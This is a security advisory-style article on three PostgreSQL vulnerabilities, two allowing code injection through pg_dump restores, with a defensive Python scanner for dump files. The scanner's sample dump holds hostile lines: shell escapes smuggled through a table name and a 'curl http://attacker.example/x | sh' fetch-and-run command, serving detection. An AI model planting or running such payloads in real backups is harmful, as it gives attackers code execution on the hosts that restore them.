Critical PostgreSQL Flaws Enable Code Injection in Restorations


The PostgreSQL Global Development Group has released security updates for all supported versions to fix three newly disclosed vulnerabilities, two of which can lead to arbitrary code execution on the machine that restores a database dump.

These vulnerabilities affect PostgreSQL versions 13 through 17, with security patches available in the latest releases: 17.6, 16.10, 15.14, 14.19, and 13.22.

Key Security Risks

  1. Two flaws in pg_dump let a user of the source database plant content that executes as arbitrary code when the dump is restored.
  2. An optimizer statistics bug exposes sampled values from data a user is not allowed to read.
  3. Organizations must upgrade immediately to the patched versions to mitigate these threats.

Exploitation Through pg_dump Utility

Two of the three flaws are in pg_dump, the standard PostgreSQL backup tool. A plain-format dump is a SQL script that psql replays on restore, so content that a source-database user gets pg_dump to write into it turns a routine restore into an attack vector. The attacker never needs to touch the backup file itself: the payload comes from the database being dumped.

CVE-2025-8714 – Superuser Code Injection (CVSS 8.8)

The most severe flaw, CVE-2025-8714, lets a malicious superuser on the source server embed arbitrary code in the dump that pg_dump produces.

  • The dump is executed by psql, and psql runs any meta-command (a backslash command such as \!, which executes a shell command) it reads from the script; the payload takes that form.
  • When an administrator restores the dump, the payload runs with the operating system privileges of the account running psql on the client machine, not merely inside the database.
  • The issue affects pg_dump, pg_dumpall, and pg_restore.

Researchers Martin Rakhmanov, Matthieu Denais, and RyotaK are credited with discovering this vulnerability.

CVE-2025-8715 – Malicious Object Name Exploit (CVSS 8.8)

The second major flaw, CVE-2025-8715, stems from pg_dump failing to neutralize newlines in object names when it writes them into its output.

  • An attacker who can name objects in the source database (by creating or renaming a table, for example) crafts a name containing a newline, so that the text after the newline is read as a fresh line of the script and interpreted as a command. Unlike CVE-2025-8714, this does not require superuser on the source.
  • During restoration these commands run as the operating system account running psql, and injected SQL statements run on the target server with the privileges of the restoring role.
  • The bug is a regression of the fix for CVE-2012-0868, reintroduced in PostgreSQL 11.20 and present in every currently supported branch.
  • It affects pg_dumpall, pg_restore, and pg_upgrade.

This vulnerability was reported by Noah Misch, a PostgreSQL contributor.
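The two code-injection paths above share one property: the payload is only dangerous because psql interprets the dump as a script. The following Python scanner is an added example (not code from the PostgreSQL project or from this article) of the pre-restore check a practitioner would want. It walks a plain-format dump with the lexical rules psql applies (single-quoted strings, double-quoted identifiers, -- comments, dollar-quoted bodies, COPY data blocks) and reports every psql meta-command reached outside those contexts, rating shell escapes and redirections high, plus the two footprints a newline inside an object name leaves in pg_dump output: the object's -- Name: header comment is split, and a quoted identifier continues across lines. The embedded sample dump, its payloads and the attacker.example host are constructed for the example; the -- Name: header layout, the \. terminator of COPY data and the meta-command names are the ones pg_dump and psql actually use. Treating a single-line COPY ... FROM stdin; statement as the start of a data block is a heuristic that matches how pg_dump writes it.

```python
"""Pre-restore triage for plain-format pg_dump / pg_dumpall scripts.

Added example, not PostgreSQL project code. psql treats a backslash outside a
string, quoted identifier, comment or dollar-quoted body as a meta-command, so
the scanner tracks that lexical state across lines and reports every
meta-command it reaches, plus the two footprints of a newline in an object
name: a split "-- Name:" header and a quoted identifier that runs past a line
break. COPY data blocks are skipped up to their end-of-data terminator line.
"""
import re
import sys

HIGH_RISK = {"!", "copy", "i", "ir", "include", "include_relative", "o", "out",
             "w", "write", "g", "gx", "gexec", "gset", "set", "setenv"}
EXPECTED = {"connect", "c"}                     # pg_dumpall writes these itself
NAME_HEADER = re.compile(r"^-- Name: .*; Type: [^;]+; Schema: [^;]*; Owner: .*$")
DOLLAR_TAG = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)?\$")
META_NAME = re.compile(r"\\(!|\?|[A-Za-z_]*)")
COPY_STDIN = re.compile(r"^COPY\s.*\sFROM\s+stdin;\s*$", re.IGNORECASE)


def scan_dump(text):
    """Return (line_number, level, message) tuples; level is high, review or info."""
    findings, state, tag, esc, in_copy = [], "code", "", False, False
    for lineno, line in enumerate(text.split("\n"), 1):
        if in_copy:                                 # COPY rows are data, not SQL
            in_copy = line != "\\."
            continue
        if state == "code" and line.startswith("-- Name:") and not NAME_HEADER.match(line):
            findings.append((lineno, "review", "malformed '-- Name:' header (newline in object name?)"))
        if state == "double":
            findings.append((lineno, "review", "quoted identifier continues across a line break"))
        i = 0
        while i < len(line):
            ch = line[i]
            if state == "code":
                if line.startswith("--", i):
                    break                           # comment runs to end of line
                if ch == "'":                       # E'...' literals honour backslash escapes
                    state = "single"
                    esc = i > 0 and line[i - 1] in "Ee" and not (i > 1 and (line[i - 2].isalnum() or line[i - 2] == "_"))
                elif ch == '"':
                    state = "double"
                elif ch == "$" and (m := DOLLAR_TAG.match(line, i)):
                    state, tag, i = "dollar", m.group(0), m.end()
                    continue
                elif ch == "\\":                    # meta-command; psql takes the rest of the line as its arguments
                    name = META_NAME.match(line, i).group(1)
                    level = "high" if name in HIGH_RISK else "info" if name in EXPECTED else "review"
                    findings.append((lineno, level, "psql meta-command: " + line[i:].rstrip()))
                    break
                i += 1
            elif state in ("single", "double"):
                q = "'" if state == "single" else '"'
                if state == "single" and esc and ch == "\\":
                    i += 2                          # skip the escaped character
                elif ch == q and not line.startswith(q * 2, i):
                    state, i = "code", i + 1
                else:
                    i += 1 + (ch == q)              # a doubled quote is a literal quote
            elif line.startswith(tag, i):           # closing tag of a dollar-quoted body
                state, i = "code", i + len(tag)
            else:
                i += 1
        if state == "code" and COPY_STDIN.match(line):
            in_copy = True
    return findings


# Constructed sample (not real pg_dump output). The table name
# "t\n\! touch /tmp/pwned\n--" splits the "-- Name:" header pg_dump writes for
# it, so the header's second line is executed as a shell escape (the
# CVE-2025-8715 shape); the last line is a bare meta-command of the kind
# CVE-2025-8714 lets a source superuser smuggle in. The "\!" inside the
# dollar-quoted function body and the "\N" in COPY data must not be reported.
SAMPLE_DUMP = r"""-- Name: log_event(); Type: FUNCTION; Schema: public; Owner: app
CREATE FUNCTION public.log_event() RETURNS void
    LANGUAGE sql AS $$ SELECT '\! only text inside a dollar-quoted body' $$;
-- Name: t
\! touch /tmp/pwned
--; Type: TABLE; Schema: public; Owner: app
CREATE TABLE public."t
\! touch /tmp/pwned
--" (id integer);
-- Name: users; Type: TABLE; Schema: public; Owner: app
CREATE TABLE public.users (id integer);
COPY public.users (id) FROM stdin;
\N
\.
\! curl http://attacker.example/x | sh
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for lineno, level, msg in scan_dump(text):
        print(f"{level:6} line {lineno}: {msg}")
```

Run it as python scan_dump.py backup.sql; with no argument it scans the embedded sample and reports the split header, both shell escapes as high and the identifier continuation lines, while leaving the \! inside the dollar-quoted body and the \N in COPY data alone. A high finding is grounds to refuse the restore; review findings need a human look. Custom-format archives (pg_dump -Fc) must first be turned into a script with pg_restore -f before scanning. The scanner is a triage aid for dumps you already hold, not a substitute for upgrading the client tools.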

CVE-2025-8713 – Information Disclosure via Optimizer Statistics (CVSS 3.1)

The third flaw, CVE-2025-8713, leaks restricted data through optimizer statistics.

  • A user with limited access to a view, partition, or child table can read sampled rows that the planner collected from the underlying data.
  • This bypasses the access control lists (ACLs) and row security policies that were meant to hide those rows.

It is far less severe than the two injection flaws, but it still leaks data that the view or policy was supposed to keep private.

Vulnerability Summary Table

CVE ID           Title                                                          CVSS v3.1  Severity
CVE-2025-8714    pg_dump lets superuser execute arbitrary code in psql          8.8        High
CVE-2025-8715    pg_dump newline in object name executes arbitrary code         8.8        High
CVE-2025-8713    Optimizer statistics expose sampled data in restricted views   3.1        Low

Mitigation and Security Best Practices

Organizations must upgrade to the patched versions:

  • PostgreSQL 17.6, 16.10, 15.14, 14.19, 13.22 (released August 14, 2025).

Two points matter when applying the fix. First, the code injection flaws live in the client-side tools, so the pg_dump, pg_dumpall, pg_restore, psql and pg_upgrade binaries on every host that takes or restores backups must be upgraded; upgrading the server alone does not protect a restore performed with unpatched tools. Second, the fix does not sanitize dumps that an unpatched pg_dump already produced, so existing backups of databases whose superusers or object-creating users you do not fully trust should be inspected before they are restored.

Additional security measures include:

  • Treating a dump as untrusted input whenever you do not control every superuser (CVE-2025-8714) or every user who can create objects (CVE-2025-8715) on the source server, as with shared, customer-supplied or recovered instances.
  • Not restoring dumps from untrusted sources on production hosts; if such a restore is unavoidable, run it under a dedicated, unprivileged operating system account on an isolated machine.
  • Applying the principle of least privilege for database administrators and limiting who holds superuser on source databases.